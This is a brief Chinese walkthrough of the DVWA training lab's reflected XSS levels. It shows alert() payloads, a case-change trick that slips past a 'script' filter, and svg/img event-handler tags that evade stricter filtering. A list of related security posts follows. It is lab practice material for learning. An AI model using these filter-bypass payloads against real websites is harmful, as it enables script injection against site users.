一、低级low
简单拿捏
<script>alert(123)</script>二、中级middle
源码过滤了script但是没有过滤大小写,改成大写S
<Script>alert(123)</script>三、高级high
比中级高,过滤了script并且以及大小写,使用其他标签,二选一就行
<svg onload=alert(123)>
<img src=x onerror=alert(123)>【dvwa靶场:XSS系列】XSS (Reflected)低-中-高级别,通关啦
假客套2024-11-06 13:19
相关推荐
世界尽头与你7 小时前
CVE-2021-40438_ Apache HTTP Server mod_proxy 模块 SSRF漏洞unable code21 小时前
攻防世界-Misc-Wire1一岁天才饺子1 天前
SSRF漏洞绕过与漏洞解决Chengbei111 天前
fastjson 原生反序列化配合动态代理绕过限制m0_466049971 天前
Webgoat-(A1)Broken Access Control:Hijack a sessionChengbei111 天前
CVE-2025-24813 Tomcat 最新 RCE 分析复现QZ166560951591 天前
2025年国内精细化、可交互、轻量级的泛监测体系产品推荐GoldY丶1 天前
【Geek渗透之路】小迪安全笔记——web安全(3)晚风(●•σ )1 天前
【华为 ICT & HCIA & eNSP 习题汇总】——题目集27unable code2 天前
攻防世界-Misc-Miscellaneous-200